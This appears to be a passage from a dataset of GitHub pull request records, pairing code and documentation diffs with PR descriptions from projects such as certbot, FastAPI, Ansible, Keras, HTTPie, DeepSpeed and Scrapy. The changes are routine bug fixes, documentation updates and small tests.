+ device = 'gpu:{}'.format(dist.ParallelEnv().dev_id)
+ if use_xpu:
+ device = 'xpu'
device = paddle.set_device(device)
config['Global']['distributed'] = dist.get_world_size() != 1
| https://api.github.com/repos/PaddlePaddle/PaddleOCR/pulls/5549 | 2022-02-23T08:37:42Z | 2022-02-23T11:05:52Z | 2022-02-23T11:05:52Z | 2022-02-23T11:05:52Z | 656 | PaddlePaddle/PaddleOCR | 41,799 |
|
Fix ubuntu package name in INSTALL.rst | diff --git a/certbot/docs/install.rst b/certbot/docs/install.rst
index 4366080e0d3..8ae1c82f2e9 100644
--- a/certbot/docs/install.rst
+++ b/certbot/docs/install.rst
@@ -191,7 +191,7 @@ Optionally to install the Certbot Apache plugin, you can use:
.. code-block:: shell
- sudo apt-get install python-certbot-apache
+ sudo apt-get install python3-certbot-apache
**Fedora**
| Since Ubuntu 18.04 there is python3-certbot-apache which should be the recommended version.
The Package 'python-certbot-apache' has no installation candidate on 20.04.
The Debian package names should probably be updated accordingly.
## Pull Request Checklist
- [ ] If the change being made is to a [distributed component](https://certbot.eff.org/docs/contributing.html#code-components-and-layout), edit the `master` section of `certbot/CHANGELOG.md` to include a description of the change being made.
- [X] Add or update any documentation as needed to support the changes in this PR.
It *is* updating the docs :-)
- [ ] Include your name in `AUTHORS.md` if you like.
Not needed. | https://api.github.com/repos/certbot/certbot/pulls/8654 | 2021-02-09T16:55:37Z | 2021-02-09T20:18:30Z | 2021-02-09T20:18:30Z | 2021-02-09T20:18:30Z | 124 | certbot/certbot | 2,113 |
🌐 Add Russian translation for `docs/ru/docs/contributing.md` | diff --git a/docs/ru/docs/contributing.md b/docs/ru/docs/contributing.md
index cb460beb0779c..f61ef1cb648a7 100644
--- a/docs/ru/docs/contributing.md
+++ b/docs/ru/docs/contributing.md
@@ -82,7 +82,7 @@ $ python -m venv env
</div>
-Ели в терминале появится ответ, что бинарник `pip` расположен по пути `.../env/bin/pip`, значит всё в порядке. 🎉
+Если в терминале появится ответ, что бинарник `pip` расположен по пути `.../env/bin/pip`, значит всё в порядке. 🎉
Во избежание ошибок в дальнейших шагах, удостоверьтесь, что в Вашем виртуальном окружении установлена последняя версия `pip`:
diff --git a/docs/ru/docs/tutorial/extra-data-types.md b/docs/ru/docs/tutorial/extra-data-types.md
new file mode 100644
index 0000000000000..efcbcb38a2390
--- /dev/null
+++ b/docs/ru/docs/tutorial/extra-data-types.md
@@ -0,0 +1,82 @@
+# Дополнительные типы данных
+
+До сих пор вы использовали простые типы данных, такие как:
+
+* `int`
+* `float`
+* `str`
+* `bool`
+
+Но вы также можете использовать и более сложные типы.
+
+При этом у вас останутся те же возможности , что и до сих пор:
+
+* Отличная поддержка редактора.
+* Преобразование данных из входящих запросов.
+* Преобразование данных для ответа.
+* Валидация данных.
+* Автоматическая аннотация и документация.
+
+## Другие типы данных
+
+Ниже перечислены некоторые из дополнительных типов данных, которые вы можете использовать:
+
+* `UUID`:
+ * Стандартный "Универсальный уникальный идентификатор", используемый в качестве идентификатора во многих базах данных и системах.
+ * В запросах и ответах будет представлен как `str`.
+* `datetime.datetime`:
+ * Встроенный в Python `datetime.datetime`.
+ * В запросах и ответах будет представлен как `str` в формате ISO 8601, например: `2008-09-15T15:53:00+05:00`.
+* `datetime.date`:
+ * Встроенный в Python `datetime.date`.
+ * В запросах и ответах будет представлен как `str` в формате ISO 8601, например: `2008-09-15`.
+* `datetime.time`:
+ * Встроенный в Python `datetime.time`.
+ * В запросах и ответах будет представлен как `str` в формате ISO 8601, например: `14:23:55.003`.
+* `datetime.timedelta`:
+ * Встроенный в Python `datetime.timedelta`.
+ * В запросах и ответах будет представлен в виде общего количества секунд типа `float`.
+ * Pydantic также позволяет представить его как "Кодировку разницы во времени ISO 8601", <a href="https://pydantic-docs.helpmanual.io/usage/exporting_models/#json_encoders" class="external-link" target="_blank">см. документацию для получения дополнительной информации</a>.
+* `frozenset`:
+ * В запросах и ответах обрабатывается так же, как и `set`:
+ * В запросах будет прочитан список, исключены дубликаты и преобразован в `set`.
+ * В ответах `set` будет преобразован в `list`.
+ * В сгенерированной схеме будет указано, что значения `set` уникальны (с помощью JSON-схемы `uniqueItems`).
+* `bytes`:
+ * Встроенный в Python `bytes`.
+ * В запросах и ответах будет рассматриваться как `str`.
+ * В сгенерированной схеме будет указано, что это `str` в формате `binary`.
+* `Decimal`:
+ * Встроенный в Python `Decimal`.
+ * В запросах и ответах обрабатывается так же, как и `float`.
+* Вы можете проверить все допустимые типы данных pydantic здесь: <a href="https://pydantic-docs.helpmanual.io/usage/types" class="external-link" target="_blank">Типы данных Pydantic</a>.
+
+## Пример
+
+Вот пример *операции пути* с параметрами, который демонстрирует некоторые из вышеперечисленных типов.
+
+=== "Python 3.6 и выше"
+
+ ```Python hl_lines="1 3 12-16"
+ {!> ../../../docs_src/extra_data_types/tutorial001.py!}
+ ```
+
+=== "Python 3.10 и выше"
+
+ ```Python hl_lines="1 2 11-15"
+ {!> ../../../docs_src/extra_data_types/tutorial001_py310.py!}
+ ```
+
+Обратите внимание, что параметры внутри функции имеют свой естественный тип данных, и вы, например, можете выполнять обычные манипуляции с датами, такие как:
+
+=== "Python 3.6 и выше"
+
+ ```Python hl_lines="18-19"
+ {!> ../../../docs_src/extra_data_types/tutorial001.py!}
+ ```
+
+=== "Python 3.10 и выше"
+
+ ```Python hl_lines="17-18"
+ {!> ../../../docs_src/extra_data_types/tutorial001_py310.py!}
+ ```
diff --git a/docs/ru/mkdocs.yml b/docs/ru/mkdocs.yml
index 808479198aa2d..fc3ca0c81bc5b 100644
--- a/docs/ru/mkdocs.yml
+++ b/docs/ru/mkdocs.yml
@@ -67,6 +67,7 @@ nav:
- Учебник - руководство пользователя:
- tutorial/body-fields.md
- tutorial/background-tasks.md
+ - tutorial/extra-data-types.md
- tutorial/cookie-params.md
- async.md
- Развёртывание:
| ## Pull Request Description
This change adds Russian translation for the `docs/ru/docs/tutorial/extra-data-types.md page` and fixed typo in `docs/ru/docs/contributing.md`.
### Changes In This Pull Request
* Created a new file `extra-data-types.md` for the translation
* Updated `mkdocs.ym`l to contain the newly added file
* Fixed small typo in `docs/ru/docs/contributing.md` | https://api.github.com/repos/tiangolo/fastapi/pulls/6002 | 2023-02-15T10:33:20Z | 2023-04-13T18:04:30Z | 2023-04-13T18:04:30Z | 2023-04-13T18:04:31Z | 1,486 | tiangolo/fastapi | 23,231 |
nxos_evpn_global refactor | diff --git a/lib/ansible/modules/network/nxos/nxos_evpn_global.py b/lib/ansible/modules/network/nxos/nxos_evpn_global.py
index 8dacf77d5c46d1..6f6b826678b5fd 100644
--- a/lib/ansible/modules/network/nxos/nxos_evpn_global.py
+++ b/lib/ansible/modules/network/nxos/nxos_evpn_global.py
@@ -16,10 +16,11 @@
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
-ANSIBLE_METADATA = {'metadata_version': '1.0',
- 'status': ['preview'],
- 'supported_by': 'community'}
-
+ANSIBLE_METADATA = {
+ 'metadata_version': '1.0',
+ 'status': ['preview'],
+ 'supported_by': 'community'
+}
DOCUMENTATION = '''
---
@@ -50,11 +51,13 @@
type: list
sample: ['nv overlay evpn']
'''
+
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.nxos import get_config, load_config
from ansible.module_utils.nxos import nxos_argument_spec
from ansible.module_utils.nxos import check_args as nxos_check_args
+
def check_args(module, warnings):
nxos_check_args(module, warnings)
@@ -62,6 +65,7 @@ def check_args(module, warnings):
if module.params[key] is not None:
warnings.append('argument %s is no longer supported, ignoring value' % key)
+
def main():
argument_spec = dict(
nv_overlay_evpn=dict(required=True, type='bool'),
@@ -74,8 +78,7 @@ def main():
argument_spec.update(nxos_argument_spec)
- module = AnsibleModule(argument_spec=argument_spec,
- supports_check_mode=True)
+ module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=True)
result = {'changed': False}
@@ -105,4 +108,3 @@ def main():
if __name__ == '__main__':
main()
-
diff --git a/test/sanity/pep8/legacy-files.txt b/test/sanity/pep8/legacy-files.txt
index 3ae817df94bd9c..cf94c6912ad03b 100644
--- a/test/sanity/pep8/legacy-files.txt
+++ b/test/sanity/pep8/legacy-files.txt
@@ -467,7 +467,6 @@ lib/ansible/modules/network/nxos/nxos_aaa_server_host.py
lib/ansible/modules/network/nxos/nxos_bgp_neighbor_af.py
lib/ansible/modules/network/nxos/nxos_command.py
lib/ansible/modules/network/nxos/nxos_config.py
-lib/ansible/modules/network/nxos/nxos_evpn_global.py
lib/ansible/modules/network/nxos/nxos_facts.py
lib/ansible/modules/network/nxos/nxos_feature.py
lib/ansible/modules/network/nxos/nxos_gir.py
| Signed-off-by: Trishna Guha <trishnaguha17@gmail.com>
##### SUMMARY
<!--- Describe the change, including rationale and design decisions -->
nxos_evon_global minor refactor to make sure the module runs without crashing.
<!---
If you are fixing an existing issue, please include "Fixes #nnn" in your
commit message and your description; but you should still explain what
the change does.
-->
##### ISSUE TYPE
<!--- Pick one below and delete the rest: -->
- Bugfix Pull Request
- Docs Pull Request
##### COMPONENT NAME
<!--- Name of the module/plugin/module/task -->
modules/network/nxos/nxos_evpn_global
##### ANSIBLE VERSION
<!--- Paste verbatim output from “ansible --version” between quotes below -->
```
devel 2.4
``` | https://api.github.com/repos/ansible/ansible/pulls/24919 | 2017-05-23T07:50:15Z | 2017-05-23T09:24:55Z | 2017-05-23T09:24:55Z | 2019-04-26T21:22:01Z | 679 | ansible/ansible | 48,769 |
Added AdoptAPet Api | diff --git a/README.md b/README.md
index feb1884bd4..33c5eac2cf 100644
--- a/README.md
+++ b/README.md
@@ -106,6 +106,7 @@
### Animals
API | Description | Auth | HTTPS | CORS |
|---|---|---|---|---|
+| [AdoptAPet](https://www.adoptapet.com/public/apis/pet_list.html) | Resource to help get pets adopted | `apiKey` | Yes | Yes |
| [Axolotl](https://theaxolotlapi.netlify.app/) | Collection of axolotl pictures and facts | No | Yes | Yes |
| [Cat Facts](https://alexwohlbruck.github.io/cat-facts/) | Daily cat facts | No | Yes | No |
| [Cataas](https://cataas.com/) | Cat as a service (cats pictures and gifs) | No | Yes | No |
| Add AdoptAPet API to Animals
<!-- Thank you for taking the time to work on a Pull Request for this project! -->
<!-- To ensure your PR is dealt with swiftly please check the following: -->
- [x] My submission is formatted according to the guidelines in the [contributing guide](/CONTRIBUTING.md)
- [x] My addition is ordered alphabetically
- [x] My submission has a useful description
- [x] The description does not have more than 100 characters
- [x] The description does not end with punctuation
- [x] Each table column is padded with one space on either side
- [x] I have searched the repository for any relevant issues or pull requests
- [x] Any category I am creating has the minimum requirement of 3 items
- [x] All changes have been [squashed][squash-link] into a single commit
[squash-link]: <https://github.com/todotxt/todo.txt-android/wiki/Squash-All-Commits-Related-to-a-Single-Issue-into-a-Single-Commit>
| https://api.github.com/repos/public-apis/public-apis/pulls/2713 | 2021-10-25T15:20:15Z | 2021-10-28T17:25:04Z | 2021-10-28T17:25:04Z | 2021-10-28T17:25:05Z | 213 | public-apis/public-apis | 35,320 |
Fix encoding error | diff --git a/docs/autogen.py b/docs/autogen.py
index 22964a17a26..d6f8b4bff65 100644
--- a/docs/autogen.py
+++ b/docs/autogen.py
@@ -269,7 +269,7 @@ def add_np_implementation(function, docstring):
def read_file(path):
- with open(path) as f:
+ with open(path, encoding='utf-8') as f:
return f.read()
@@ -326,7 +326,7 @@ def get_module_docstring(filepath):
Also finds the line at which the docstring ends.
"""
- co = compile(open(filepath).read(), filepath, 'exec')
+ co = compile(open(filepath, encoding='utf-8').read(), filepath, 'exec')
if co.co_consts and isinstance(co.co_consts[0], six.string_types):
docstring = co.co_consts[0]
else:
@@ -347,8 +347,9 @@ def copy_examples(examples_dir, destination_dir):
module_path = os.path.join(examples_dir, file)
docstring, starting_line = get_module_docstring(module_path)
destination_file = os.path.join(destination_dir, file[:-2] + 'md')
- with open(destination_file, 'w+') as f_out, \
- open(os.path.join(examples_dir, file), 'r+') as f_in:
+ with open(destination_file, 'w+', encoding='utf-8') as f_out, \
+ open(os.path.join(examples_dir, file),
+ 'r+', encoding='utf-8') as f_in:
f_out.write(docstring + '\n\n')
@@ -391,7 +392,7 @@ def generate(sources_dir):
readme = read_file(os.path.join(str(keras_dir), 'README.md'))
index = read_file(os.path.join(template_dir, 'index.md'))
index = index.replace('{{autogenerated}}', readme[readme.find('##'):])
- with open(os.path.join(sources_dir, 'index.md'), 'w') as f:
+ with open(os.path.join(sources_dir, 'index.md'), 'w', encoding='utf-8') as f:
f.write(index)
print('Generating docs for Keras %s.' % keras.__version__)
@@ -457,7 +458,7 @@ def generate(sources_dir):
subdir = os.path.dirname(path)
if not os.path.exists(subdir):
os.makedirs(subdir)
- with open(path, 'w') as f:
+ with open(path, 'w', encoding='utf-8') as f:
f.write(mkdown)
shutil.copyfile(os.path.join(str(keras_dir), 'CONTRIBUTING.md'),
| <!--
Please make sure you've read and understood our contributing guidelines;
https://github.com/keras-team/keras/blob/master/CONTRIBUTING.md
Note:
We are no longer adding new features to multi-backend Keras (we only fix bugs), as we are refocusing development efforts on tf.keras. If you are still interested in submitting a feature pull request, please direct it to tf.keras in the TensorFlow repository instead.
-->
### Summary
Running `autogen.py` in Windows fails with the following error:
`UnicodeDecodeError: 'cp949' codec can't decode byte 0xbf in position 2: illegal multibyte sequence
`
Passing `utf-8` encoding argument fixes the error.
### Related Issues
### PR Overview
- [n] This PR requires new unit tests [y/n] (make sure tests are included)
- [n] This PR requires to update the documentation [y/n] (make sure the docs are up-to-date)
- [y] This PR is backwards compatible [y/n]
- [n] This PR changes the current API [y/n] (all API changes need to be approved by fchollet)
| https://api.github.com/repos/keras-team/keras/pulls/13355 | 2019-09-23T08:42:06Z | 2019-09-25T21:52:14Z | 2019-09-25T21:52:14Z | 2019-09-26T08:18:27Z | 601 | keras-team/keras | 47,525 |
fix issue with parsing renewal confs | diff --git a/letsencrypt/renewer.py b/letsencrypt/renewer.py
index 0a490d44752..8f7f38c90e0 100644
--- a/letsencrypt/renewer.py
+++ b/letsencrypt/renewer.py
@@ -179,7 +179,9 @@ def main(cli_args=sys.argv[1:]):
# RenewableCert object for this cert at all, which could
# dramatically improve performance for large deployments
# where autorenewal is widely turned off.
- cert = storage.RenewableCert(renewal_file, cli_config)
+ cert = storage.RenewableCert(
+ os.path.join(cli_config.renewal_configs_dir, renewal_file),
+ cli_config)
except errors.CertStorageError:
# This indicates an invalid renewal configuration file, such
# as one missing a required parameter (in the future, perhaps
diff --git a/letsencrypt/storage.py b/letsencrypt/storage.py
index 7e2802b146a..5186cd945a5 100644
--- a/letsencrypt/storage.py
+++ b/letsencrypt/storage.py
@@ -260,7 +260,7 @@ def current_target(self, kind):
:returns: The path to the current version of the specified
member.
- :rtype: str
+ :rtype: str or None
"""
if kind not in ALL_FOUR:
diff --git a/letsencrypt/tests/renewer_test.py b/letsencrypt/tests/renewer_test.py
index daec9678f68..d583e864575 100644
--- a/letsencrypt/tests/renewer_test.py
+++ b/letsencrypt/tests/renewer_test.py
@@ -764,6 +764,8 @@ def test_main(self, mock_renew, mock_rc, mock_notify):
def test_bad_config_file(self):
from letsencrypt import renewer
+ os.unlink(os.path.join(self.cli_config.renewal_configs_dir,
+ "example.org.conf"))
with open(os.path.join(self.cli_config.renewal_configs_dir,
"bad.conf"), "w") as f:
f.write("incomplete = configfile\n")
| previously it only passed the name of the config file which prevented the following code from opening it. Now we pass the full path
split on multiple lines for linting
| https://api.github.com/repos/certbot/certbot/pulls/1929 | 2015-12-17T03:08:48Z | 2015-12-18T19:41:44Z | 2015-12-18T19:41:44Z | 2016-05-06T19:22:01Z | 487 | certbot/certbot | 1,187 |
Update Requests documentation links | diff --git a/docs/README.md b/docs/README.md
index 41ed503006..7dbdaf11b8 100644
--- a/docs/README.md
+++ b/docs/README.md
@@ -1453,7 +1453,8 @@ $ http --proxy=http:http://user:pass@10.10.1.10:3128 example.org
### Environment variables
-You can also configure proxies by environment variables `ALL_PROXY`, `HTTP_PROXY` and `HTTPS_PROXY`, and the underlying [Requests library](https://python-requests.org/) will pick them up.
+You can also configure proxies by environment variables `ALL_PROXY`, `HTTP_PROXY` and `HTTPS_PROXY`, and the underlying
+[Requests library](https://requests.readthedocs.io/en/latest/) will pick them up.
If you want to disable proxies configured through the environment variables for certain hosts, you can specify them in `NO_PROXY`.
In your `~/.bash_profile`:
@@ -2553,7 +2554,7 @@ HTTPie has the following community channels:
Under the hood, HTTPie uses these two amazing libraries:
-- [Requests](https://python-requests.org) — Python HTTP library for humans
+- [Requests](https://requests.readthedocs.io/en/latest/) — Python HTTP library for humans
- [Pygments](https://pygments.org/) — Python syntax highlighter
#### HTTPie friends
| This is a quick follow up from psf/requests#6140. This PR fixes the dead link by moving it to https://requests.readthedocs.io/en/latest/ which will be the primary domain for the project going forward. | https://api.github.com/repos/httpie/cli/pulls/1414 | 2022-06-17T19:13:40Z | 2022-06-17T21:04:43Z | 2022-06-17T21:04:42Z | 2022-06-17T21:05:55Z | 301 | httpie/cli | 33,757 |
add missing methods to MPS_Accelerator | diff --git a/accelerator/mps_accelerator.py b/accelerator/mps_accelerator.py
index f6303cf9890f..972b33caece1 100644
--- a/accelerator/mps_accelerator.py
+++ b/accelerator/mps_accelerator.py
@@ -24,6 +24,15 @@ def __init__(self):
def is_synchronized_device(self):
return False
+ def use_host_timers(self):
+ return self.is_synchronized_device()
+
+ def resolves_data_dependency(self):
+ return self.is_synchronized_device()
+
+ def handles_memory_backpressure(self):
+ return self.is_synchronized_device()
+
# Device APIs
def device_name(self, device_index=None):
if device_index is None:
diff --git a/tests/unit/accelerator/test_accelerator.py b/tests/unit/accelerator/test_accelerator.py
new file mode 100644
index 000000000000..964cf2b24f4e
--- /dev/null
+++ b/tests/unit/accelerator/test_accelerator.py
@@ -0,0 +1,59 @@
+# Copyright (c) Microsoft Corporation.
+# SPDX-License-Identifier: Apache-2.0
+
+# DeepSpeed Team
+
+import pytest
+
+import os
+import sys
+import importlib
+import re
+
+import deepspeed
+
+DS_ACCEL_PATH = "deepspeed.accelerator"
+IGNORE_FILES = ["abstract_accelerator.py", "real_accelerator.py"]
+
+
+@pytest.fixture
+def accel_class_name(module_name):
+ class_list = []
+ mocked_modules = []
+
+ # Get the accelerator class name for a given module
+ while True:
+ try:
+ module = importlib.import_module(module_name)
+ break
+ except ModuleNotFoundError as e:
+ # If the environment is missing a module, mock it so we can still
+ # test importing the accelerator class
+ missing_module = re.search(r"\'(.*)\'", e.msg).group().strip("'")
+ sys.modules[missing_module] = lambda x: None
+ mocked_modules.append(missing_module)
+ for name in dir(module):
+ if name.endswith("_Accelerator"):
+ class_list.append(name)
+
+ assert len(class_list) == 1, f"Multiple accelerator classes found in {module_name}"
+
+ yield class_list[0]
+
+ # Clean up mocked modules so as to not impact other tests
+ for module in mocked_modules:
+ del sys.modules[module]
+
+
+@pytest.mark.parametrize(
+ "module_name",
+ [
+ DS_ACCEL_PATH + "." + f.rstrip(".py") for f in os.listdir(deepspeed.accelerator.__path__[0])
+ if f.endswith("_accelerator.py") and f not in IGNORE_FILES
+ ],
+)
+def test_abstract_methods_defined(module_name, accel_class_name):
+ module = importlib.import_module(module_name)
+ accel_class = getattr(module, accel_class_name)
+ accel_class.__init__ = lambda self: None
+ _ = accel_class()
| #5026 introduced new abstract methods for the base accelerator class. These methods were not defined for `MPS_Accelerator`. Fixes #5132 | https://api.github.com/repos/microsoft/DeepSpeed/pulls/5134 | 2024-02-14T18:55:04Z | 2024-02-14T23:14:24Z | 2024-02-14T23:14:24Z | 2024-02-14T23:14:28Z | 685 | microsoft/DeepSpeed | 10,681 |
[tensor]fix test_linear | diff --git a/colossalai/tensor/_ops/linear.py b/colossalai/tensor/_ops/linear.py
index e75f18609baa..d8bc338a5b43 100644
--- a/colossalai/tensor/_ops/linear.py
+++ b/colossalai/tensor/_ops/linear.py
@@ -19,8 +19,9 @@ def colo_linear(types, args, kwargs, pg):
bias = None
else:
bias = kwargs.get('bias', None)
- if isinstance(bias, ColoTensor):
- bias = bias.torch_tensor()
+
+ if isinstance(bias, ColoTensor):
+ bias = bias.torch_tensor()
# Add communication logic before and after linear call.
if isinstance(weight, ColoTensor):
diff --git a/tests/test_tensor/test_op.py b/tests/test_tensor/test_op.py
index c45dca8da46c..6cd45df447a2 100644
--- a/tests/test_tensor/test_op.py
+++ b/tests/test_tensor/test_op.py
@@ -3,7 +3,6 @@
from colossalai.tensor import ColoTensor
from copy import deepcopy
-
def test_linear():
in_dim = 4
out_dim = 5
@@ -45,7 +44,6 @@ def test_linear():
# torch.nn.init.uniform_(t)
# print(t)
-
def test_element_wise():
t_ref = torch.randn(3, 5)
t = ColoTensor.init_from_torch_tensor(t_ref.clone())
@@ -66,6 +64,11 @@ def test_lazy_init_tensor():
assert lazy_t._torch_tensor == None
assert lazy_t.torch_tensor().numel() == 6
-if __name__ == '__main__':
+def check_all():
+ test_linear()
+ test_element_wise()
test_no_wrap_op()
- # test_element_wise()
+ test_lazy_init_tensor()
+
+if __name__ == '__main__':
+ check_all()
| https://api.github.com/repos/hpcaitech/ColossalAI/pulls/826 | 2022-04-21T09:14:25Z | 2022-04-21T09:18:56Z | 2022-04-21T09:18:56Z | 2022-04-21T09:18:56Z | 441 | hpcaitech/ColossalAI | 11,308 |
|
[MRG+1] Enable robots.txt handling by default for new projects. | diff --git a/docs/topics/settings.rst b/docs/topics/settings.rst
index cc070d8c0d7..0959a87a735 100644
--- a/docs/topics/settings.rst
+++ b/docs/topics/settings.rst
@@ -750,8 +750,8 @@ Default: ``60.0``
Scope: ``scrapy.extensions.memusage``
The :ref:`Memory usage extension <topics-extensions-ref-memusage>`
-checks the current memory usage, versus the limits set by
-:setting:`MEMUSAGE_LIMIT_MB` and :setting:`MEMUSAGE_WARNING_MB`,
+checks the current memory usage, versus the limits set by
+:setting:`MEMUSAGE_LIMIT_MB` and :setting:`MEMUSAGE_WARNING_MB`,
at fixed time intervals.
This sets the length of these intervals, in seconds.
@@ -877,7 +877,13 @@ Default: ``False``
Scope: ``scrapy.downloadermiddlewares.robotstxt``
If enabled, Scrapy will respect robots.txt policies. For more information see
-:ref:`topics-dlmw-robots`
+:ref:`topics-dlmw-robots`.
+
+.. note::
+
+ While the default value is ``False`` for historical reasons,
+ this option is enabled by default in settings.py file generated
+ by ``scrapy startproject`` command.
.. setting:: SCHEDULER
@@ -1036,7 +1042,7 @@ TEMPLATES_DIR
Default: ``templates`` dir inside scrapy module
The directory where to look for templates when creating new projects with
-:command:`startproject` command and new spiders with :command:`genspider`
+:command:`startproject` command and new spiders with :command:`genspider`
command.
The project name must not conflict with the name of custom files or directories
diff --git a/scrapy/templates/project/module/settings.py.tmpl b/scrapy/templates/project/module/settings.py.tmpl
index 822812c9aba..f13e8587106 100644
--- a/scrapy/templates/project/module/settings.py.tmpl
+++ b/scrapy/templates/project/module/settings.py.tmpl
@@ -18,6 +18,9 @@ NEWSPIDER_MODULE = '$project_name.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = '$project_name (+http://www.yourdomain.com)'
+# Obey robots.txt rules
+ROBOTSTXT_OBEY = True
+
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
| A proposed fix for #1668.
For backwards compatibility reasons the default value is not changed: settings for existing projects or settings used for CrawlerProcess won't change.
| https://api.github.com/repos/scrapy/scrapy/pulls/1724 | 2016-01-26T12:48:53Z | 2016-01-26T13:19:15Z | 2016-01-26T13:19:15Z | 2016-01-27T19:48:26Z | 553 | scrapy/scrapy | 34,864 |
[AIRFLOW-XXX] Add Aizhamal Nurmamat kyzy to contributors list | diff --git a/docs/project.rst b/docs/project.rst
index 14f68f438e742..59fa904ea4c2e 100644
--- a/docs/project.rst
+++ b/docs/project.rst
@@ -58,6 +58,7 @@ Committers
- @jmcarp (Joshua Carp)
- @KevinYang21 (Kevin Yang)
- @mik-laj (Kamil Breguła)
+- @aijamalnk (Aizhamal Nurmamat kyzy)
For the full list of contributors, take a look at `Airflow's Github
| Make sure you have checked _all_ steps below.
### Jira
- [ ] My PR addresses the following [Airflow Jira](https://issues.apache.org/jira/browse/AIRFLOW/) issues and references them in the PR title. For example, "\[AIRFLOW-XXX\] My Airflow PR"
- https://issues.apache.org/jira/browse/AIRFLOW-XXX
- In case you are fixing a typo in the documentation you can prepend your commit with \[AIRFLOW-XXX\], code changes always need a Jira issue.
- In case you are proposing a fundamental code change, you need to create an Airflow Improvement Proposal ([AIP](https://cwiki.apache.org/confluence/display/AIRFLOW/Airflow+Improvements+Proposals)).
- In case you are adding a dependency, check if the license complies with the [ASF 3rd Party License Policy](https://www.apache.org/legal/resolved.html#category-x).
### Description
- [ ] Here are some details about my PR, including screenshots of any UI changes:
### Tests
- [ ] My PR adds the following unit tests __OR__ does not need testing for this extremely good reason:
### Commits
- [ ] My commits all reference Jira issues in their subject lines, and I have squashed multiple commits if they address the same issue. In addition, my commits follow the guidelines from "[How to write a good git commit message](http://chris.beams.io/posts/git-commit/)":
1. Subject is separated from body by a blank line
1. Subject is limited to 50 characters (not including Jira issue reference)
1. Subject does not end with a period
1. Subject uses the imperative mood ("add", not "adding")
1. Body wraps at 72 characters
1. Body explains "what" and "why", not "how"
### Documentation
- [ ] In case of new functionality, my PR adds documentation that describes how to use it.
- All the public functions and the classes in the PR contain docstrings that explain what it does
- If you implement backwards incompatible changes, please leave a note in the [Updating.md](https://github.com/apache/airflow/blob/master/UPDATING.md) so we can assign it to a appropriate release
### Code Quality
- [ ] Passes `flake8`
| https://api.github.com/repos/apache/airflow/pulls/5370 | 2019-06-04T21:30:33Z | 2019-06-06T07:23:46Z | 2019-06-06T07:23:46Z | 2019-06-06T07:23:46Z | 132 | apache/airflow | 14,656 |
[Classifier]: Progress bar for validation | diff --git a/classifier.py b/classifier.py
index c35292a5a07..91281510760 100644
--- a/classifier.py
+++ b/classifier.py
@@ -208,8 +208,11 @@ def train():
def test(model, dataloader, names, criterion=None, verbose=False, pbar=None):
model.eval()
pred, targets, loss = [], [], 0
+ n = len(dataloader) # number of batches
with torch.no_grad():
- for images, labels in dataloader:
+ desc = f'{pbar.desc}validating'
+ bar = tqdm(dataloader, desc, n, False, bar_format='{l_bar}{bar:10}{r_bar}{bar:-10b}', position=0)
+ for images, labels in bar:
images, labels = resize(images.to(device)), labels.to(device)
y = model(images)
pred.append(torch.max(y, 1)[1])
@@ -221,7 +224,7 @@ def test(model, dataloader, names, criterion=None, verbose=False, pbar=None):
correct = (targets == pred).float()
if pbar:
- pbar.desc += f"{loss / len(dataloader):<12.3g}{correct.mean().item():<12.3g}"
+ pbar.desc += f"{loss / n:<12.3g}{correct.mean().item():<12.3g}"
accuracy = correct.mean().item()
if verbose: # all classes
|
## 🛠️ PR Summary
<sub>Made with ❤️ by [Ultralytics Actions](https://github.com/ultralytics/actions)<sub>
### 🌟 Summary
Improved progress bar and accuracy reporting in model validation phase.
### 📊 Key Changes
- Added a variable `n` to store the number of batches in the data loader.
- Implemented a tqdm progress bar for the validation step to provide real-time feedback.
- Adjusted the loss calculation to use the new `n` variable for better code clarity.
### 🎯 Purpose & Impact
- **Enhanced User Experience:** The addition of a tqdm progress bar makes it easier for users to track the validation process, leading to a more interactive and informative experience. 📈
- **Improved Code Clarity:** Using the `n` variable for the number of batches simplifies how the loss is calculated and reported, reducing potential confusion for maintainers and contributors. 🧐
- **Accurate Metrics Display:** The progress bar now more accurately displays loss and accuracy, resulting in more reliable performance metrics for users. 🔍 | https://api.github.com/repos/ultralytics/yolov5/pulls/8387 | 2022-06-29T02:43:16Z | 2022-06-29T17:00:08Z | 2022-06-29T17:00:08Z | 2024-01-19T09:09:29Z | 335 | ultralytics/yolov5 | 24,951 |
Update installation instructions for debian | diff --git a/docs/README.md b/docs/README.md
index dbab8714ec..d7b8241e08 100644
--- a/docs/README.md
+++ b/docs/README.md
@@ -162,6 +162,8 @@ Also works for other Debian-derived distributions like MX Linux, Linux Mint, dee
```bash
# Install httpie
+$ curl -SsL https://packages.httpie.io/deb/KEY.gpg | apt-key add -
+$ curl -SsL -o /etc/apt/sources.list.d/httpie.list https://packages.httpie.io/deb/httpie.list
$ apt update
$ apt install httpie
```
diff --git a/docs/installation/methods.yml b/docs/installation/methods.yml
index 0828b0d603..79c78e3a0c 100644
--- a/docs/installation/methods.yml
+++ b/docs/installation/methods.yml
@@ -36,6 +36,8 @@ tools:
package: https://packages.debian.org/sid/web/httpie
commands:
install:
+ - curl -SsL https://packages.httpie.io/deb/KEY.gpg | apt-key add -
+ - curl -SsL -o /etc/apt/sources.list.d/httpie.list https://packages.httpie.io/deb/httpie.list
- apt update
- apt install httpie
upgrade:
| https://api.github.com/repos/httpie/cli/pulls/1373 | 2022-04-27T13:18:02Z | 2022-05-05T15:40:53Z | 2022-05-05T15:40:53Z | 2022-05-05T15:40:53Z | 304 | httpie/cli | 33,980 |
|
[MRG] Fix typo in SGD documentation | diff --git a/doc/modules/sgd.rst b/doc/modules/sgd.rst
index 7c515d5459cec..e8febda201bf7 100644
--- a/doc/modules/sgd.rst
+++ b/doc/modules/sgd.rst
@@ -279,7 +279,7 @@ Mathematical formulation
========================
Given a set of training examples :math:`(x_1, y_1), \ldots, (x_n, y_n)` where
-:math:`x_i \in \mathbf{R}^n` and :math:`y_i \in \{-1,1\}`, our goal is to
+:math:`x_i \in \mathbf{R}^m` and :math:`y_i \in \{-1,1\}`, our goal is to
learn a linear scoring function :math:`f(x) = w^T x + b` with model parameters
:math:`w \in \mathbf{R}^m` and intercept :math:`b \in \mathbf{R}`. In order
to make predictions, we simply look at the sign of :math:`f(x)`.
|
<!--
Thanks for contributing a pull request! Please ensure you have taken a look at
